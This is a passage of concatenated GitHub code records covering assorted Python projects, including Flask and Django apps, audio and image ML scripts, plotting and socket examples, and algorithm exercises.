embed.add_field(name=\"Reason: \", value=f\"{reason}\")\r\n await rchannel.send(embed=embed)\r\n\r\ndef setup(bot):\r\n bot.add_cog(utility(bot))\r\n print(\"Utility cog loaded\\n----------\\n\")","repo_name":"Sable-20/BLP","sub_path":"cogs/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
{"seq_id":"2913498600","text":"import os \nfrom Models import Directory,File\nfrom Controllers import directoryController,fileController,dbController\nfrom flask import Flask \nfrom flask_session import Session\nfrom Authentication.authentication import authentication\nclass Configuration():\n def __init__(self):\n self.currentDir=Directory.Directory(\"FILEMAN\",os.path.expanduser('~'))\n self.currentDirCon=directoryController.directoryController(self.currentDir)\n self.currentDirCon.addDir(self.currentDir.getName())\n 
self.fileCon=fileController.fileController(File.File('',self.currentDirCon.getCurrentDir()))\n self.app = Flask(__name__)\n self.app.secret_key='filemanRules*!&@'\n self.app.config['UPLOAD_FOLDER'] = os.path.join(\"FILEMAN\",os.path.expanduser('~'))\n self.app.config['SESSION_PERMANENT']= False\n self.app.config['SESSION_TYPE']= 'filesystem'\n Session(self.app)\n self.dbCon = dbController.dbController('user.db')\n self.table = \"\"\" CREATE TABLE users(\n username TEXT NOT NULL,\n password TEXT NOT NULL,\n root TEXT NOT NULL\n );\"\"\"\n self.auth=authentication(self.dbCon)\n\n def getControllers(self):\n \"\"\"returns controllers required by flask app\"\"\"\n return self.currentDirCon,self.fileCon, self.dbCon\n\n def getUsrControllers(self):\n '''returns user directory controller'''\n con=directoryController.directoryController(Directory.Directory(\"FILEMAN\",os.path.expanduser('~')))\n print('con::::'+con.getCurrentDir())\n return con \n\n \n \n def getAuth(self):\n return self.auth\n\n def getApp(self):\n \"\"\"returns app object\"\"\"\n return self.app\n\n def getTable(self):\n \"\"\"returns table string with columns to be created\"\"\"\n return self.table\n ","repo_name":"Tamsanqa743/FileMan","sub_path":"App/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"14593007808","text":"import librosa\nfrom scipy import spatial\nfrom scipy.signal import resample\nimport numpy as np\nimport cv2\n\ndef cosine_similarity(x, y):\n return 1 - spatial.distance.cosine(x, y)\n\ndef next_pow_2(x):\n \"\"\"Smallest next power of two of a given value x.\"\"\"\n return 1 << (x - 1).bit_length()\n\n\ndef mfccs(path):\n audio_signal, sample_rate = librosa.core.load(path)\n first_five_minutes = sample_rate * 60 * 5\n\n audio_signal_first_five_minutes = audio_signal[:first_five_minutes]\n number_of_audio_samples = len(audio_signal_first_five_minutes)\n audio_duration = float(\n number_of_audio_samples / float(sample_rate))\n\n audio_frame_size = next_pow_2(int(sample_rate / 4.0)) # i.e., about 0.25 seconds.\n audio_hop_size = int(audio_frame_size / 2.0) # i.e., 50% overlap.\n\n mfccs_matrix = librosa.feature.mfcc(\n audio_signal_first_five_minutes, n_fft=audio_frame_size, hop_length=audio_hop_size)\n\n\n number_of_seconds = int(np.round(audio_duration))\n return np.array(resample(mfccs_matrix.transpose(), number_of_seconds))\n\nep1 = mfccs(\"videos/House.Of.Cards.S01E03.720p.BluRay.x265.mp4\")\nep2 = mfccs(\"videos/House.Of.Cards.S01E04.720p.BluRay.x265.mp4\")\n\nscaledep1 = cv2.resize(ep1, (7200, 7200), interpolation=cv2.INTER_CUBIC)\nscaledep2 = cv2.resize(ep2, (7200, 7200), interpolation=cv2.INTER_CUBIC)\n\n\nnp.save(\"np/House.Of.Cards.S01E03.720p.BluRay.x265.npy\", scaledep1)\nnp.save(\"np/House.Of.Cards.S01E04.720p.BluRay.x265.npy\", scaledep2)\n","repo_name":"GijsWeterings/Notflix","sub_path":"extractaudio.py","file_name":"extractaudio.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22272468170","text":"import json\r\nfrom numpy import source\r\nimport pandas as pd\r\n\r\n\r\ndf=pd.read_csv('mvf_user.csv')\r\n\r\nmvf_user=df.groupby(['user_id','email_id']).apply(lambda x:x.to_json(orient='records')).reset_index().rename(columns={0:'status'})\r\nmvf_json = json.loads(mvf_user.to_json(orient ='records'))\r\n\r\n\r\nwith open(\"mvf_user.json\" , \"w\") as f:\r\n 
count=0\r\n f.write(\"{\")\r\n f.write('\"data\":[')\r\n #f.write(\"{\")\r\n for obj in mvf_json:\r\n obj[\"status\"] = json.loads(obj[\"status\"])\r\n json.dump(obj, f, indent=4)\r\n count=count+1\r\n print(count)\r\n if count<=42:\r\n f.write(\",\")\r\n\r\n \r\n f.write(\"]\")\r\n f.write(\"}\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"Chetana-Rera/Assignment_1","sub_path":"test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23948921904","text":"\n\nfrom django.views import generic\nfrom . import models\n\nfrom django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import PageNotAnInteger\n\nclass BlogIndex(generic.ListView):\n queryset = models.Entry.objects.published()\n template_name = 'home.html'\n paginate_by = 2\n\n\n def get_context_data(self, **kwargs):\n context = super(BlogIndex, self).get_context_data(**kwargs)\n blog_entries = models.Entry.objects.all()\n paginator = Paginator(blog_entries, self.paginate_by)\n\n page = self.request.GET.get('page')\n\n try:\n entry_page = paginator.page(page)\n except PageNotAnInteger:\n entry_page = paginator.page(1)\n except EmptyPage:\n entry_page = paginator.page(paginator.num_pages)\n\n context['object_list'] = entry_page\n context['recent_entries'] = blog_entries\n return context\n\nclass BlogDetail(generic.DetailView):\n model = models.Entry\n template_name = 'post.html'\n\n def get_context_data(self, **kwargs):\n context = super(BlogDetail, self).get_context_data(**kwargs)\n blog_entries = models.Entry.objects.all()\n \n context['recent_entries'] = blog_entries\n return context\n","repo_name":"BraedenYoung/SimpleDjangoBlog","sub_path":"devblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20770374964","text":"import os\nfrom queue import Queue\nfrom VideoProducer import VideoProducer\nfrom VideoConsumer import VideoConsumer\nfrom ExcelWriter import ExcelWriter\n\nif __name__ == \"__main__\":\n model_Path = r\"D:\\desk\\3.1\\SD\\Project\\Model\\acute egret 2nd blue object novelty TA h.h5\" # Training model path - Change to your pc path\n folder_path = r\"D:\\desk\\3.1\\SD\\Project\\Frames\\acute egret 2nd blue object novelty TA h\" # Path for frames folder - Change to your pc path\n video_Path = r\"D:\\desk\\3.1\\SD\\Project\\Video\\acute egret 2nd blue object novelty TA h.mp4\" # path to video - Change to your pc path\n video_name = \"acute egret 2nd blue object novelty TA h\" # Video name - Change to your video name\n sheet_path = r\"D:\\desk\\3.1\\SD\\Project\\Model\" # Path to save excel sheet - Change to your pc path\n\n sheet = r\"{}\\{}.xlsx\".format(sheet_path, video_name)\n\n q = Queue()\n ExcelQ = Queue()\n DependcisQ = Queue()\n shape = (128, 128)\n\n folder_list = []\n\n for folder in os.listdir(folder_path):\n if os.path.isdir(os.path.join(folder_path, folder)):\n folder_list.append(folder)\n else:\n print(\"Incorrect Path !!\")\n\n classes = folder_list\n\n P = VideoProducer(q, DependcisQ, video_Path, model_Path, classes, shape)\n C = VideoConsumer(q, DependcisQ, ExcelQ)\n W = ExcelWriter(ExcelQ, sheet)\n P.start()\n C.start()\n W.start()\n\n P.join()\n C.join()\n W.join()\n","repo_name":"MohamedAanwar/Software_Dev_2023","sub_path":"03 
processing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15192447405","text":"#!/usr/bin/env python\n\"\"\" Adds links in the manual pages to tutorials that utilize the functions\"\"\"\n\nimport os\n\ndef processfile(petsc_dir,dir,file,keyre,mdict,uses):\n '''Find all functions used in the tutorial and add links to the manual page for the function'''\n #print('Processing '+os.path.join(dir,file))\n with open(os.path.join(dir,file),'r') as fd:\n text = fd.read()\n found = list(set(keyre.findall(text)))\n for i in found:\n if len(uses[i]) < 10:\n uses[i].append(os.path.join(dir,file))\n\ndef processdir(petsc_dir,dir,keyre,mdict,uses):\n '''Loop over tutorials, call processfile() on each'''\n #print('Processing '+dir)\n for file in os.listdir(dir):\n if os.path.isfile(os.path.join(dir,file)) and (file.endswith('.c') or file.endswith('.cxx')): processfile(petsc_dir,dir,file,keyre,mdict,uses)\n\ndef loadmanualpagescit(petsc_dir):\n '''Loads and parses the manualpages.cit file generated by Sowing doctext'''\n import re\n mdict = {}\n PATTERN = re.compile(r'man:\\+(.*)\\+\\+(.*)\\+\\+\\+\\+man\\+\\.\\./(.*)#.*')\n EXCLUDE_PATTERN = re.compile('PetscCall|Petsc[A-Z]*Int|PetscReal|PetscScalar|PetscBool|PetscComplex|PetscErrorCode|SETERR|PetscLog|PETSC_FALSE|PETSC_TRUE')\n with open(os.path.join(petsc_dir,'doc','manualpages','manualpages.cit'),'r') as fd:\n text = fd.read()\n for line in text.split():\n m = re.match(PATTERN, line)\n # print('Manual page '+m.group(1)+' location '+m.group(3))\n if re.match(EXCLUDE_PATTERN,m.group(1)): continue\n mdict[m.group(1)] = m.group(3)\n # sort to find enclosing names first\n mdict = dict(sorted(mdict.items(), key=lambda item: len(item[0]), reverse = True))\n keyre = re.compile('|'.join(list(mdict.keys())))\n uses = {i: [] for i in mdict.keys()}\n return keyre,mdict,uses\n\ndef main(petsc_dir):\n keyre,mdict,uses = loadmanualpagescit(petsc_dir)\n for dirpath, dirnames, filenames in os.walk(os.path.join(petsc_dir,'src'),topdown=True):\n dirnames[:] = [d for d in dirnames if d not in ['output', 'ftn-custom', 'f90-custom', 'ftn-auto', 'f90-mod', 'tests', 'binding']]\n if dirpath.endswith('tutorials'):\n processdir(petsc_dir,dirpath,keyre,mdict,uses)\n\n for i in mdict:\n if len(uses[i]) > 0:\n manpage = os.path.join(petsc_dir,'doc','manualpages',mdict[i])\n with open(manpage,'a') as fd:\n fd.write('\\n## Examples\\n')\n for j in uses[i]:\n file = j.replace(petsc_dir+'/','')\n fd.write(''+file+'
\\n')\n\nif __name__ == \"__main__\":\n main(os.path.abspath(os.environ['PETSC_DIR']))\n","repo_name":"petsc/petsc","sub_path":"doc/build_man_examples_links.py","file_name":"build_man_examples_links.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"96"} +{"seq_id":"70567899516","text":"from statistics import median_low\n\ncount = int(input())\nfor i in range(count):\n data = input().split(' ')\n data = [int(d) for d in data]\n data = data[1:]\n data.sort()\n \n mid = median_low(data)\n\n dis = 0\n for address in data:\n dis += abs(mid-address)\n print(dis)","repo_name":"fdsf53451001/leetcode","sub_path":"uva10041.py","file_name":"uva10041.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"8984199101","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport platform\n\n\nif platform.system() == \"Linux\":\n dir_name = ''\nelse:\n dir_name = os.path.dirname(__file__).rsplit(\"/\", 1)[0]\n\nplot_dir = os.path.join(dir_name, \"data\", \"plots\")\nuse_dirs = ['Test', 'Train']\n\n\ndef heat_map(set_type, dataset):\n # Correlation Matrix Heatmap\n f, ax = plt.subplots(figsize=(10, 6))\n\n correlation = dataset.corr()\n\n hm = sns.heatmap(round(correlation,2), annot=True, ax=ax, cmap=\"coolwarm\", fmt='.2f',\n linewidths=.05, annot_kws={\"size\": 6})\n\n f.subplots_adjust(top=0.93)\n #f = f.suptitle(type + ' Audio Data Correlation Heatmap', fontsize=14, va=\"top\")\n # plt.show()\n plt.savefig(os.path.join(plot_dir, set_type.lower()+\"_heatmap.png\"), bbox_inches='tight')\n\n\ndef pairwise_scatter(set_type, headers, dataset):\n # Scatter Plot\n cols = headers\n pp = sns.pairplot(dataset[cols], hue='TrafficIncident', height=1.8, aspect=1.8,\n palette={\"Yes\": \"#7A81A3\", \"No\": \"#76C6C9\"},\n plot_kws=dict(edgecolor=\"black\", linewidth=0.5))\n\n fig = pp.fig\n\n fig.subplots_adjust(top=0.93, wspace=0.3)\n #f = fig.suptitle(type + 'Audio Data Pairwise Plots', fontsize=14, va=\"top\")\n # plt.show()\n plt.savefig(os.path.join(plot_dir, set_type.lower()+\"_scatter.png\"), bbox_inches='tight')\n\n\ndef main():\n\n for dir_type in use_dirs:\n\n csv_file = pd.read_csv(os.path.join(os.path.dirname(__file__).rsplit(\"/\", 1)[0],\n \"data\", dir_type.lower() + \"_traffic_audio.csv\"),header=0)\n\n csv_headers = list(csv_file.columns.values)\n dataset = csv_file.drop(\"reference\", axis=1)\n headers = list(dataset.columns.values)\n attribute_headers = headers[0:len(headers) - 1]\n\n heat_map(dir_type, dataset)\n pairwise_scatter(dir_type, headers, dataset)\n\n\nmain()\n\n","repo_name":"Steveguile/AuditorySampling","sub_path":"data_miner/Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23599819138","text":"from http import server\nimport socket\n\n# TCP/IP 소켓 생성\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# 소켓 연결\nserver_address = (\"localhost\", 2222)\nsock.bind(server_address)\n\n# 클라이언트로부터의 연결을 감청\nsock.listen(1)\nprint(\"Waiting for a client to connect\")\nclient, client_port = sock.accept()\nprint(\"Connection from client %s:%s\" % client_port)\n\n# 클라이언트로부터의 요청을 수신\nrequest = client.recv(14)\nprint(f'Client sent \"{request.decode()}\"')\n\n# 응답 송신\nreply = b\"And Beyond!\"\nprint(f'Server replies 
\"{reply.decode()}\"')\nclient.sendall(reply)\n\nclient.close()\n","repo_name":"sookyeongyeom/computer-science-overview","sub_path":"code/socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71859213756","text":"#23.01.06\n#트리의 지름\n#골드4\n\n#dijkstra: 시간초과(O(N^2logN))\nimport sys\nfrom heapq import heappop, heappush\nfrom collections import defaultdict\ninput = sys.stdin.readline\nINF = sys.maxsize\n\ndef dijkstra(start):\n q = [(0, start)]\n distance = [INF]*n\n distance[start-1] = 0\n\n while q:\n dis, cur = heappop(q)\n\n if dis > distance[cur-1]:\n continue\n\n for i in edges[cur]:\n tmp = dis+i[1]\n\n if tmp < distance[i[0]-1]:\n distance[i[0]-1] = tmp\n heappush(q, (tmp, i[0]))\n\n return distance\n\nn = int(input())\nedges = defaultdict(list)\ndis = set()\n\nfor _ in range(n-1):\n u, v, w = map(int, input().split())\n edges[u].append([v, w])\n edges[v].append([u, w])\n\nanswer = 0\nleaves = []\nfor i in edges.keys():\n if len(edges[i]) == 1:\n leaves.append(i)\n \nfor i in leaves:\n answer = max(answer, max(dijkstra(i)))\n\nprint(answer)\n\n#dfs(재귀): 시간초과\n#dfs(스택): 통과(O(N^2))\nimport sys\nfrom collections import defaultdict, deque\ninput = sys.stdin.readline\n\ndef dfs(start):\n global answer\n visited = [0]*(N+1)\n need_visited = deque([[start, 0]])\n visited[start] = 1\n\n while need_visited:\n cur, weight = need_visited.pop()\n if answer < weight:\n answer = weight\n\n for n, w in dic[cur]:\n if visited[n] == 0:\n visited[n] = 1\n need_visited.append([n, weight+w])\n\nN = int(input())\ndic = defaultdict(list)\n\nfor _ in range(N-1):\n u, v, w = map(int, input().split())\n dic[u].append((v, w))\n dic[v].append((u, w))\n\nleaves = []\nfor i in dic.keys():\n if len(dic[i]) == 1:\n leaves.append(i)\n\nanswer = 0\nfor i in leaves:\n dfs(i)\nprint(answer)\n\n# bfs: 통과(O(N^2))\nimport sys\nfrom collections import defaultdict, deque\ninput = sys.stdin.readline\n\ndef bfs(start):\n global answer\n q = deque([[start, 0]])\n visited = [0] * (N+1)\n visited[start] = 1\n\n while q:\n cur, weight = q.popleft()\n if answer < weight:\n answer = weight\n \n for n, w in dic[cur]:\n if visited[n] == 0:\n visited[n] = 1\n q.append([n, weight + w])\n\nN = int(input())\ndic = defaultdict(list)\n\nfor _ in range(N-1):\n u, v, w = map(int, input().split())\n dic[u].append((v, w))\n dic[v].append((u, w))\n\nleaves = []\nfor i in dic.keys():\n if len(dic[i]) == 1:\n leaves.append(i)\n\nanswer = 0\nfor i in leaves:\n bfs(i)\nprint(answer)","repo_name":"915dbfl/youlAlgorithm","sub_path":"zip/graph/dfs_bfs/diameter_of_the_tree(gold4)⭐.py","file_name":"diameter_of_the_tree(gold4)⭐.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"7958475141","text":"from PIL import Image\nimport glob, numpy as np\nfrom keras.models import load_model\n\n#예측 데이터 불러오기\ncaltech_dir = \"./trensfer/test\"\n\nX = []\nfilenames = []\nfiles = glob.glob(caltech_dir+\"/*.*\")\n\nfor i, f in enumerate(files):\n pixel = open(f,\"r\")\n y = pixel.read()\n pixel.close()\n filenames.append(f)\n \n y = y.replace(\"'\",\"\")\n y = y.replace(\"[\",\"\")\n y = y.replace(\"]\",\"\")\n y = y.replace(\"\\n\",\"\")\n y = y.split(\",\")\n \n for j in range(0,len(y)):\n y[j] = float(y[j])\n\n data = np.array(y)\n data = data.reshape(8,8)\n X.append(data)\n\nX = np.array(X)\nX = X.reshape(len(X),8,8,1)\n\n#예측 
모델 불러와서 모델 예측\nmodel3 = load_model('./model/multi_img_classification.model')\n\nprediction = model3.predict(X)\nnp.set_printoptions(formatter={'float': lambda x: \"{0:0.3f}\".format(x)})\ncnt = 0\n\n#모든 모델에 대한 예측값 보여주\nfor i in prediction:\n pre_ans = i.argmax()\n print(i)\n print(pre_ans)\n pre_ans_str = ''\n \n if pre_ans >= 0.8:\n pre_ans_str = \"null\"\n elif pre_ans >= 0.8:\n pre_ans_str = \"noise\"\n else:\n pre_ans_str = \"finger\"\n \n if i[0] >= 0.8 :\n print(\"해당 \"+filenames[cnt].split(\"\\\\\")[1]+\"이미지는 \"+pre_ans_str+\"로 추정됩니다.\")\n if i[1] >= 0.8:\n print(\"해당 \"+filenames[cnt].split(\"\\\\\")[1]+\"이미지는 \"+pre_ans_str+\"으로 추정됩니다.\")\n if i[2] >= 0.8:\n print(\"해당 \"+filenames[cnt].split(\"\\\\\")[1]+\"이미지는 \"+pre_ans_str+\"로 추정됩니다.\")\n cnt += 1\n\n","repo_name":"AIZEUN/Adafruit88XXCNN","sub_path":"thermal_test_predict.py","file_name":"thermal_test_predict.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73312815675","text":"# Look at to the case:\n# https://www.hackerrank.com/challenges/grading/problem\n\ndef gradingStudents(grades):\n '''\n res = []\n for grade in grades:\n if grade % 5 > 2 and grade >= 38:\n grade += 5 - (grade % 5)\n res.append(grade)\n\n return res\n '''\n # One line solution\n return [(e + 5 - (e % 5) if e % 5 > 2 and e >= 38 else e) for e in grades]\n\n\nif __name__ == '__main__':\n grades_count = int(input())\n\n grades = []\n\n for _ in range(grades_count):\n grades_item = int(input())\n grades.append(grades_item)\n\n result = gradingStudents(grades)\n\n print(*result, sep=\"\\n\")\n","repo_name":"tryoasnafi/hackerrank","sub_path":"problems/001_grading_students/grading_students.py","file_name":"grading_students.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30964689389","text":"#!/usr/bin/python\n\nimport os\nos.chdir('../../')\n\nfrom pymongo import MongoClient\nfrom tqdm import tqdm\nimport time\n\nfrom youtubeauditframework.utils.YouTubeAuditFrameworkConfig import Config\nfrom pseudoscientificvideosdetection.PseudoscienceClassifier import PseudoscienceClassifier\nfrom youtubehelpers.YouTubeVideoDownloader import YouTubeVideoDownloader\n\n\nclass DownloadAnnotateExperimentsVideos(object):\n \"\"\"\n Class that downloads all the required information and annotates all the videos encountered during our experiments\n \"\"\"\n def __init__(self):\n #\n # MongoDB Configuration\n #\n # Host and Port\n self.client = MongoClient('localhost', 27017)\n # DB name\n self.db = self.client[Config.DB_NAME]\n # Collections\n # self.audit_framework_videos_col = self.db.audit_framework_videos\n self.audit_framework_videos_col = self.db[Config.AUDIT_FRAMEWORK_VIDEOS_COL]\n\n # Create a YouTube Video Downloader Object\n self.VIDEO_DOWNLOADER = YouTubeVideoDownloader()\n\n # Create Video Classifier Object\n self.VIDEO_ANNOTATOR = PseudoscienceClassifier()\n return\n\n def get_all_notannotated_videos(self):\n \"\"\"\n Method that returns a list with all the YouTube Video encountered during the\n experiments and have not been annotated\n :return:\n \"\"\"\n all_notannotated_videos = self.audit_framework_videos_col.find({\n '$and': [\n {'classification.classification_category': None}\n ]\n })\n return [video_info['id'] for video_info in all_notannotated_videos]\n\n def delete_videos_labels(self):\n \"\"\"\n Method that deletes the label of all the videos in the 
collection\n \"\"\"\n self.audit_framework_videos_col.update_many({}, {'$unset': {'classification': 1}})\n return\n\n def annotate_videos(self):\n \"\"\"\n Method that annotates all the non-annotated videos\n :return:\n \"\"\"\n # Get all not annotated videos\n all_videos = self.get_all_notannotated_videos()\n\n # Download the information adn annotate videos\n progressBar = tqdm(total=len(all_videos))\n for video_id in all_videos:\n print('\\n--- [VIDEO: {}] DOWNLOADING INFORMATION AND ANNOTATING VIDEO'.format(video_id))\n # Get Video Details\n video_details = self.audit_framework_videos_col.find_one({'id': video_id})\n\n # Download Video Comments\n self.VIDEO_DOWNLOADER.download_video_comments(video_id=video_id)\n\n # Download Video Transcript\n self.VIDEO_DOWNLOADER.download_video_transcript(video_id=video_id)\n\n # Annotate Video\n video_label, confidence_score = self.VIDEO_ANNOTATOR.classify(video_details=video_details)\n\n # Update Video Information\n self.audit_framework_videos_col.update_one({'id': video_id}, {'$set': {'classification.classification_category': video_label}})\n\n # Sleep to avoid IP address banning when downloading videos' transcript\n # IMPORTANT: Don't change this to less than 5 seconds\n time.sleep(5)\n progressBar.update(1)\n progressBar.close()\n return\n\n\nif __name__ == '__main__':\n # Init variables\n DELETE_VIDEO_LABELS = False\n ANNOTATE_VIDEOS = True\n\n # YOUTUBE_DATA_API_KEY = ''\n # if YOUTUBE_DATA_API_KEY == '':\n # exit('Please fill your YouTube Data API Key')\n\n # Create a Video Annotator Object\n experimentsVideosAnnotatorObject = DownloadAnnotateExperimentsVideos()\n\n # Delete Video Labels\n if DELETE_VIDEO_LABELS:\n experimentsVideosAnnotatorObject.delete_videos_labels()\n\n # Annotate Experiments Videos\n if ANNOTATE_VIDEOS:\n experimentsVideosAnnotatorObject.annotate_videos()","repo_name":"kostantinos-papadamou/pseudoscience-paper","sub_path":"youtubeauditframework/helpers/download_annotate_experiment_videos.py","file_name":"download_annotate_experiment_videos.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"177036920","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n rightMostView = []\n\n def rightSideView(self, root: Optional[TreeNode]) -> List[int]:\n depthOfTree = self.getDepthOfTree(root)\n self.rightMostView = [None for x in range(depthOfTree)]\n depth = 0\n self.findRightmostElementAtLevel(root, depth)\n return self.rightMostView\n\n \n def findRightmostElementAtLevel(self,root,depth):\n if(not root):\n return False\n if(self.rightMostView[depth] == None):\n self.rightMostView[depth] = root.val\n self.findRightmostElementAtLevel(root.right,depth+1)\n self.findRightmostElementAtLevel(root.left,depth+1)\n print(self.rightMostView)\n \n \n def getDepthOfTree(self, root):\n if(not root):\n return 0\n l_depth = self.getDepthOfTree(root.left)\n r_depth = self.getDepthOfTree(root.right)\n if(l_depth > r_depth):\n return l_depth+1\n else:\n return r_depth+1","repo_name":"hhk998402/leetcode-diary","sub_path":"199. 
Binary Tree Right Side View/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39695122101","text":"from backend.settings import MEDIA_BASE_URL, DEBUG, MEDIA_ROOT\nfrom django.core.files.storage import FileSystemStorage\n\nimport json\nimport csv\nimport os\nimport numpy as np\nfrom pprint import pprint\nfrom time import time\n\nfrom taxonomy.models import Family, Subfamily, Genus, Species\nfrom image.models import Image\n\nstrt_time = time()\n\nHIER_ORDER = ['species', 'genus', 'subfamily', 'family']\nprob_order = [x+'_prob' for x in HIER_ORDER]\nprediction_keys = HIER_ORDER + prob_order\nNUM_RESULTS = 5\nNUM_EXAMPLE_IMAGES = 6\n\n#Model class should not have to class Tensorflow Container?\n\n# in hierarchy model subclass\ndef load_class_hierarchy_map(model_record):\n \n class_map_str = model_record.class_hierarchy_map\n class_hierarchy_map = json.loads(class_map_str)\n\n return class_hierarchy_map\n\n\n#part of generic base model class\ndef softmax(x):\n\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum()\n\n#in hierarchy model subclass\ndef calc_class_probas(model_raw_response, class_hierarchy_map):\n \"\"\"\n sum up the probabilites at each hierarchical level\n \"\"\"\n\n probas = {}\n probas[HIER_ORDER[0]] = softmax(model_raw_response)\n\n for i in range(1, len(HIER_ORDER)):\n \n parent_key = HIER_ORDER[i]\n child_key = HIER_ORDER[i-1]\n probas[parent_key] = np.bincount(class_hierarchy_map[parent_key], weights=probas[child_key])\n\n return probas\n\n\n#in hierarchy model subclass\ndef calc_top_results(all_class_probas, hier_enco):\n\n # subscript(insert) the probabilities for each level in the hierarchy\n prob_levels = [all_class_probas[key][hier_enco[:,i]] for i, key in enumerate(HIER_ORDER)]\n arr_prob = np.array(prob_levels)\n arr_prob = arr_prob \n\n # multi index sort, from last column in array to first \n # (ie from coarsest to finest hierarchical level / top down) \n sort_keys = np.lexsort(arr_prob)\n\n # take top n results\n top_sorted_keys = sort_keys[::-1][:NUM_RESULTS]\n top_probs = arr_prob.transpose()[top_sorted_keys,:]\n top_classes = hier_enco[top_sorted_keys,:]\n\n return top_classes, top_probs\n\n#NOT in class\ndef query_db_to_make_dict_of_taxonomy_names(species_key):\n \n res_dict = {}\n\n s = Species.objects.get(id=species_key)\n g = Genus.objects.get(species=s.id)\n sf = Subfamily.objects.get(genus=g.id)\n f = Family.objects.get(subfamily=sf.id)\n\n res_dict['species'] = s.name\n res_dict['genus'] = g.name\n res_dict['subfamily'] = sf.name\n res_dict['family'] = f.name\n\n return res_dict\n\n\n#NOT in class\ndef query_example_images(species_key, num_images):\n \n fs = FileSystemStorage()\n\n qs = Image.objects.filter(imageclassification__species_key=species_key)\n res = qs.values('image').distinct()[:num_images].values()\n \n return [fs.url(obj['image']) for obj in res]\n\n#in class\ndef process_model_response(model_record, model_response):\n \n if DEBUG:\n print('model returned: ', model_response.status_code)\n \n model_response_dict = json.loads(model_response.text)\n model_raw_values = model_response_dict['predictions'][0] #these model values are known as logits\n\n if DEBUG:\n print('model_raw_values: ', str(model_raw_values[:15])[:-1], ' ...')\n\n #Load model reference data\n class_hierarchy_map = model_record.class_hierarchy_map\n hier_enco = 
np.array(model_record.encoded_hierarchy)\n model_key_map = model_record.species_key_map\n\n # create sorted results\n all_class_probas = calc_class_probas(model_raw_values, class_hierarchy_map)\n top_model_classes, top_probs = calc_top_results(all_class_probas, hier_enco)\n\n top_db_classes = [model_key_map[str(m_key[0])] for m_key in top_model_classes]\n\n if DEBUG:\n print('all_class_probas: ', all_class_probas)\n print('top_probs : ', top_probs)\n print('top_classes : ', top_model_classes)\n print('top_db_classes: ', top_db_classes)\n\n predictions = {}\n prob_order = ['species_prob', 'genus_prob', 'subfamily_prob', 'family_prob']\n\n #loop over the classes_probs list to assemble the predictions part of the json response\n \n for i, species_key in enumerate(top_db_classes):\n \n res_dict = query_db_to_make_dict_of_taxonomy_names(species_key)\n probs_dict = dict(zip(prob_order, top_probs[i,:].tolist()))\n res_dict.update(probs_dict)\n\n img_lst = query_example_images(species_key, NUM_EXAMPLE_IMAGES)\n res_dict['example_images'] = img_lst\n res_dict['example_image_0'] = img_lst[0] # included for legacy reasons due to how mobile app consumes the reponse\n res_dict['description'] = \"\"\n res_dict['index'] = species_key\n predictions[i] = res_dict\n\n return predictions","repo_name":"GenieTim/biodex--prediction-api","sub_path":"app/uploadforpredict/prediction_postprocessing.py","file_name":"prediction_postprocessing.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"96"} +{"seq_id":"35384241074","text":"# encoding: utf-8\n'''\nFile: localizable.py\nAuthor: Oliver Zscheyge\nDescription:\n Localizable super class for metrics, rules and reports.\n'''\n\nclass Localizable(object):\n \"\"\"Common interface for Metrics, Rules and Reports.\n \"\"\"\n def __init__(self, ID, language, brief, description):\n \"\"\"Initializer.\n Args:\n ID: ID of the localizable object (unicode string).\n language: Language code, e.g. 
